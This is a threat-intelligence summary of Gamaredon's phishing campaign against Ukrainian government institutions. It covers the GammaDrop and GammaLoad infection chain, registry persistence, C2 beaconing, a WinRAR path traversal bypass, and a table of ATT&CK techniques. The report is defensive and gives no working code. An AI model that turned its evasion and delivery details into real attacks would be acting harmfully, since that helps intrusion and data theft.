EXECUTIVE SUMMARY
Gamaredon's threat campaign targets Ukrainian state institutions with the goal of data theft. These emails, often spoofed or sent from compromised government accounts, deliver persistent, multi-stage VBScript downloaders that profile the infected system. The attackers' ultimate goal is to steal sensitive information, and the campaign has been ongoing for several months, with new waves emerging at a roughly monthly cadence. The threat actors behind Gamaredon have been exploiting the CVE-2025-8088 vulnerability.[/subscribe_to_unlock_form]
EXECUTIVE SUMMARY
Gamaredon's threat campaign targets Ukrainian state institutions with the goal of data theft. These emails, often spoofed or sent from compromised government accounts, deliver persistent, multi-stage VBScript downloaders that profile the infected system. The attackers' ultimate goal is to steal sensitive information, and the campaign has been ongoing for several months, with new waves emerging at a roughly monthly cadence. The threat actors behind Gamaredon have been exploiting the CVE-2025-8088 vulnerability.[emaillocker id="1283"]
The malware infection chain begins with a spoofed email, which delivers a RAR archive containing a VBScript payload, GammaDrop. This payload fetches a remote HTA file, GammaLoad, from a Cloudflare Workers C2 server and executes it. The HTA file establishes persistence via a RunOnce registry key and beacons victim data to the C2 server, enabling the operator to selectively deliver a tailored payload. The malware also uses a unique, redundant path traversal pattern to bypass WinRAR path traversal mitigations.
Once inside the system, the malware establishes persistence and beacons victim data to the C2 server, allowing the attacker to selectively deliver a tailored payload. Gamaredon's tooling is auto-generated and parameterized per wave, producing samples that vary in their communication parameters with superficial code changes that preserve the same underlying functionality. However, the payload delivered via GammaLoad appears to be operator-controlled and is not automatically served. The attackers have been using a unique, redundant path traversal pattern to bypass WinRAR path traversal mitigations, making it difficult to detect the malware. The campaign has been ongoing, with new waves emerging at a roughly monthly cadence, and organisations should be on high alert to prevent a potential breach.
THREAT PROFILE:
| Tactic | Technique ID | Technique | Sub-technique |
| Resource Development | T1583.003 | Acquire Infrastructure | Virtual Private Server |
| Initial Access | T1566.001 | Phishing | Spearphishing Attachment |
| Defense Evasion | T1218.005 | System Binary Proxy Execution | Mshta |
| Execution | T1059.005 | Command and Scripting Interpreter | Visual Basic |
| Persistence | T1547.001 | Boot or Logon Autostart Execution | Registry Run Keys / Startup Folder |
| Defense Evasion | T1564.004 | Hide Artifacts | NTFS File Attributes |
| Defense Evasion | T1027 | Obfuscated Files or Information | — |
| Initial Access | T1078 | Valid Accounts | — |
| Discovery | T1082 | System Information Discovery | — |
| Discovery | T1047 | Windows Management Instrumentation | — |
| Command and Control | T1071.001 | Application Layer Protocol | Web Protocols |
| Command and Control | T1008 | Fallback Channels | — |
REFERENCES:
reports contain further technical details:
https://harfanglab.io/insidethelab/gamaredon-gammadrop-gammaload/